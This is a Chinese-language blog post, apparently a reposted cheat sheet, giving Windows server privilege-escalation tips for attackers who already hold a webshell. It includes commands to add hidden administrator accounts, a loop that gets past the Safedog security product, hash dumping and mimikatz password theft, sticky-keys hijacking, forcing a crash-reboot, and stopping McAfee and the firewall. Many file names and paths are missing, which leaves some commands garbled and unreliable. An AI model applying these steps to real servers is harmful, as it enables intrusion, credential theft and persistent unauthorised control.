2024年3月26日发(作者:)
### 提权技巧
拒绝访问就自己上传一个,自己上传的cmd是不限制后缀的,还可以是
等
user不能执行有时候是被删除了,可以先试试net1,不行就自己上
传一个
执行exp没回显的解决方法:com路径那里输入exp路径
C:
,命令那里清空(包括/c )输入
net user jianmei daxia
/add
4.有时候因为监控而添加用户失败,试试上传抓取hash的工具,如,得
到hash之后可以进行破解,建议重定向结果到保存为
cmd /c c: >
,在条件允许的情况下
也可以用mimikatz直接抓明文
5.有时候权限很松,很多命令都可以执行,但是就是增加不上用户,这时候你就要考
虑是不是因为密码过于简单或是过于复杂了
6.用扫出来的目录,其中红色的文件可以替换成exp,执行命令时cmd那里输
入替换的文件路径,下面清空双引号加增加用户的命令
7.有时候可以添加用户,但是添加不到管理组,有可能是administrators组改名
了,使用命令
net user administrator
查看管理组的名字
8.有的cmd执行很变态,asp马里,cmd路径填上面,下面填:"c:
whoami” 记得前面加两个双引号,不行后面也两个,不行就把exp的路径放在cmd那
里,下面不变
9.当添加不上用户却可以添加“增加用户的Vbs、bat)的时候,就添加一个吧,然后
用“直接使服务器蓝屏重启的东东”让服务器重启就提权成功
10.菜刀执行的技巧,上传cmd到可执行目录,右击cmd 虚拟终端,help 然后setp
c: 设置终端路径为:
c:
11.支持aspx但跨不了目录的时候,可以上传一个读iis的vbs,执行命令列出所有网
站目录,找到主站的目录就可以跨过去了,上传到可执行目录,
接着上传到网站根目录,cmd命令
cmd /c
“c:” d:
11.如何辨别服务器是不是内网?
12.安全狗下加用户的语句::
for /l %i in (1,1,1000) do @net user test
test [/add&@net]() localgroup administrators test /add
13.21对应的FTP、1433对应的MSSQL、3306对应的MYSQL、3389对应的远程桌面、
1521对应的Oracle、5631对应的pcanywhere
14.劫持提权,说到这个,想必肯定会想到这类工具,有时候在蛋疼怎么都
加不上账户的时候,可以试试劫持shift、添加开机启动等等思路
15.提权成功但3389端口没开,执行语句或是工具开3389失败的时候,可以上传
,登陆进去就是system权限,这时候再尝试开3389希望较大
### 常用DOS命令
查看版本:
ver
查看权限:
whoami
查看配置:
systeminfo
查看用户:
net user
查看进程:
tasklist
查看正在运行的服务:
tasklist /svc
查看开放的所有端口:
netstat -ano
查询管理用户名:
query user
查看搭建环境:
ftp 127.0.0.1
查看指定服务的路径:
sc qc Mysql
添加一个用户:
net user jianmei /add
提升到管理权限:
net localgroup administrators jianmei /add
添加用户并提升权限:
net user jianmei /add & net localgroup
administrators jianmei /add
查看制定用户信息:
net user jianmei
查看所有管理权限的用户:
net localgroup administrators
加入远程桌面用户组:
net localgroup “Remote Desktop Users” jianmei /add
突破最大连接数:
mstsc /admin /v:127.0.0.1
删除用户:
net user jianmei /del
删除管理员账户:
net user administrator
更改系统登陆密码:
net password
激活GUEST用户:
net user guest /active:yes
开启TELNET服务:
net start telnet
关闭麦咖啡:
net stop “McAfee McShield”
关闭防火墙:
net stop sharedaccess
查看当前目录的所有文件:
dir c:windows
发布评论